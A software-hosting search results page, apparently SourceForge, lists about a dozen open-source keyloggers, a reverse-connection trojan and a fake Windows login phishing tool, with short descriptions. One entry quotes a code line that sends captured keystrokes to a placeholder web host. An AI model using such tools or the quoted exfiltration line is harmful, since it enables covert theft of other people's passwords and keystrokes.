Showing 14 open source projects for "pc-basic - a gw-basic emulator"

View related business solutions
  • The Secure Workspace for Remote Work Icon
    The Secure Workspace for Remote Work

    Venn isolates and protects work from any personal use on the same computer, whether BYO or company issued.

    Venn is a secure workspace for remote work that isolates and protects work from any personal use on the same computer. Work lives in a secure local enclave that is company controlled, where all data is encrypted and access is managed. Within the enclave – visually indicated by the Blue Border around these applications – business activity is walled off from anything that happens on the personal side. As a result, work and personal uses can now safely coexist on the same computer.
    Learn More
  • Modernize Your Lab with the #1 Rated LIMS Icon
    Modernize Your Lab with the #1 Rated LIMS

    Labs that need a powerful LIMS system

    Nothing is more critical to a lab’s success than the quality, security, and traceability of samples. The Lockbox LIMS system provides robust sample management functionality to laboratory professionals, giving them full visibility on every aspect of a sample’s journey, from accessioning to long-term storage.
    Learn More
  • 1
    ...Il software è sotto la licenza New BSD . La versione attuale è un' alpha.( https://en.wikipedia.org/wiki/Software_release_life_cycle) This software can prevent some elementary,basic , keyloggers from stealing our passwords and/or usernames since the text values can be written with a virtual text box and the value thus produced is passed “via javascript” to the text box of the web page thus skipping the keyboard stream that could be intercepted . The software is under the New BSD license . The current version is an 'alpha.( https://en.wikipedia.org/wiki/Software_release_life_cycle)
    Downloads: 0 This Week
    Last Update:
    See Project
  • 2

    Personal Productivity Tool

    Time tracking and recording multiple screens and keystrokes

    Enables multiple screen capture and key stroke recording. Not meant to run hidden but is for tracking personal productivity where an individual requires time-sheets to be filled in or to track activity for playback and recovery automatically. Does not connect over the network or try upload any files. All capture is local and virus free. This is meant to be a productivity tracker and not a key logging tool on other users machines. That is why it is not a service and not hidden. Refer to the...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 3
    Shell Keylogger

    Shell Keylogger

    Quick, simple, terminal inspired keylog tool for beginners

    Very basic, easy to read, easy to use keylogger tool. Developed for education purposes, and runs on the terminal. Includes option to run in stealth mode
    Downloads: 0 This Week
    Last Update:
    See Project
  • 4

    Cobrax trojan

    Cobrax Trojan - 1.0

    Troyano de conexion inversa desarrollado en C++ & Visual Basic 6.0, con codigo abierto.
    Downloads: 1 This Week
    Last Update:
    See Project
  • Feroot AI automates website security with 24/7 monitoring Icon
    Feroot AI automates website security with 24/7 monitoring

    Trusted by enterprises, healthcare providers, retailers, SaaS platforms, payment service providers, and public sector organizations.

    Feroot unifies JavaScript behavior analysis, web compliance scanning, third-party script monitoring, consent enforcement, and data privacy posture management to stop Magecart, formjacking, and unauthorized tracking.
    Learn More
  • 5

    KeyPie

    Open Source Keylogger

    Its a basic open Source Keylogger Software.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 6

    Windows Domain Credentials Phishing Tool

    Video: https://vimeo.com/89782344

    While performing a Pen test for a client i needed to catch a domain user name and password, there are several ways to gain users passwords and it really depends on a lot of factors on how to get it in my case i didn't had time to wait for the user to enter his credentials and get it using a key logger so I and @Roni_Bachar created a fake windows domain login window to tried to force and trick the user to enter his password. There are several tools and techniques such as "Mimikatz" but...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 7

    ICRON's Keyloger

    Version one of ICRON's Basic Keylogger

    This is just an extremely basic key-logger.The source code is up so have fun. This key-logger stores it's logs inside of a text file known as Logs.txt. Later versions will contain a couple perks. I will release them in the coming weeks. This is for educational purposes only. I do not condone any nefarious uses for said keylogger. DO NOT USE ON ANY SYSTEM THAT IS NOT YOUR OWN.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 8
    Skope Surveillance Suite [DEPRECATED]

    Skope Surveillance Suite [DEPRECATED]

    Monitor Activity on your Computer by Auto Screenshot Capture

    **NOTE: This project is deprecated due to obsolete code. If you are interested, a replacement project was started at github.com/gundermanc/skope-3. It is incomplete, but mostly functional. I am looking for developers to take over this project. Welcome to Skope. Skope is the intuitive, user friendly, and free open source monitoring solution from Gundersoft. Not just a keylogger, Skope is literally a "Skope" into your computer's usage. During the Skope setup, you are prompted to type in...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 9
    Janilogger

    Janilogger

    Visual Basic based keylogger program

    Janilogger collects keystrokes to a textbox. And send the collected data to website panel. The asp file send datas to database. For example: You uploaded your log.asp to x.com . Janilogger sends datas to your database via log.asp with this command Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text") -Log.asp included in source files
    Downloads: 1 This Week
    Last Update:
    See Project
  • Go beyond a virtual data room with Datasite Diligence Icon
    Go beyond a virtual data room with Datasite Diligence

    Datasite Diligence, helps dealmakers in more than 170 countries close more deals, faster.

    The data room with a view. Evolved for next-generation M&A. Built on decades of deal experience. Packed with expert tools, yet intuitive for novices. A fully mobile platform with frictionless processes. Smart AI tools that let you close more deals, faster, plus end-to-end support at all times. Do due diligence with intelligence.
    Learn More
  • 10

    VB6 KeyLog

    A simple keylogger for visual basic 6

    A simple keylogger written in VB6. Source included. No viruses - of course. Don't take my word, read through the source and build yourself! It was written by mj-thompson, a 15 year old, to show off to computer teachers :p FOR LEGAL USE ONLY.
    Downloads: 7 This Week
    Last Update:
    See Project
  • 11
    Basic Key Logger
    Non-stealth keylogger for Windows. Records mouse and keyboard (precision~10-15ms), log of events (disk size~2.5k/s) + log of operations (~ 0.2k/s). Standalone, with local copy of Python: unzip to install, delete to uninstall.NEW: hidden/visible icon
    Downloads: 0 This Week
    Last Update:
    See Project
  • 12
    Camiel's Multi Tool
    dit is een Multi Tool die voral bedoelt is voor gebruik op voortgezet onderwijs.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 13
    A basic keylogger developed by Alpha.Aetsu (New version in March-April on 2010)
    Downloads: 0 This Week
    Last Update:
    See Project
  • 14
    Sniper is a powerful keylogger component that can be easily integrated in applications. It is a small,easy-to-use ActiveX control that encapsulates all the complexity for logging keys and exposes a few important properties and methods.
    Downloads: 0 This Week
    Last Update:
    See Project
  • Previous
  • You're on page 1
  • Next
MongoDB Logo MongoDB